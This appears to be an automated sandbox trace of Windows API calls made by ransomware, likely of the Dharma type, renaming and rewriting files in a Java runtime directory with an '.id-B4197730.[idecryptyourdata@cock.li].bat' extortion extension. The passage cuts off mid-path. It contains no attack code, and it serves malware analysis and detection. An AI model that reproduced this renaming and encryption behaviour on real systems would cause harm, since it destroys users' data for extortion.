[0158.635] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.635] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.635] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.635] CloseHandle (hObject=0x450) returned 1 [0158.641] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.641] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.641] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.641] CloseHandle (hObject=0x45c) returned 1 [0158.642] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.642] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.642] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.643] CloseHandle (hObject=0x45c) returned 1 [0158.644] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.644] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.644] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.644] CloseHandle (hObject=0x45c) returned 1 [0158.646] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.646] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.646] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.646] CloseHandle (hObject=0x45c) returned 1 [0158.647] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.647] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.647] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.647] CloseHandle (hObject=0x45c) returned 1 [0158.649] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.649] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.649] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.649] CloseHandle (hObject=0x45c) returned 1 [0158.650] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.650] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.650] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.650] CloseHandle (hObject=0x45c) returned 1 [0158.651] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.651] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.651] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.652] CloseHandle (hObject=0x45c) returned 1 [0158.653] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.653] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.653] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.654] CloseHandle (hObject=0x45c) returned 1 [0158.654] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.654] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.655] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.655] CloseHandle (hObject=0x45c) returned 1 [0158.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.660] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.660] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.660] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.660] CloseHandle (hObject=0x45c) returned 1 [0158.661] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.662] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.662] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.662] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.662] CloseHandle (hObject=0x45c) returned 1 [0158.664] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.664] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.664] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.664] CloseHandle (hObject=0x45c) returned 1 [0158.665] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.822] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.822] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.822] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.823] CloseHandle (hObject=0x43c) returned 1 [0158.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.885] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.885] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.885] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.886] CloseHandle (hObject=0x484) returned 1 [0158.887] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.887] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.887] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.888] CloseHandle (hObject=0x484) returned 1 [0158.889] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.889] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.890] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.890] CloseHandle (hObject=0x484) returned 1 [0158.891] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.891] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.891] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.891] CloseHandle (hObject=0x484) returned 1 [0158.892] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.892] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.892] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.893] CloseHandle (hObject=0x484) returned 1 [0158.894] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.894] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.895] CloseHandle (hObject=0x484) returned 1 [0158.896] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.896] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.896] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.896] CloseHandle (hObject=0x484) returned 1 [0158.899] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.900] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.900] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.900] CloseHandle (hObject=0x484) returned 1 [0158.901] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.901] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.901] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.901] CloseHandle (hObject=0x484) returned 1 [0158.902] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.902] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.902] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.902] CloseHandle (hObject=0x484) returned 1 [0158.904] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.904] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.904] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.904] CloseHandle (hObject=0x484) returned 1 [0158.905] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.905] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.905] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.906] CloseHandle (hObject=0x484) returned 1 [0158.907] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.907] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.907] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.907] CloseHandle (hObject=0x484) returned 1 [0158.908] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.908] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.908] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.908] CloseHandle (hObject=0x484) returned 1 [0158.915] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.915] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.915] CreateFileW (lpFileName="C:\\Program 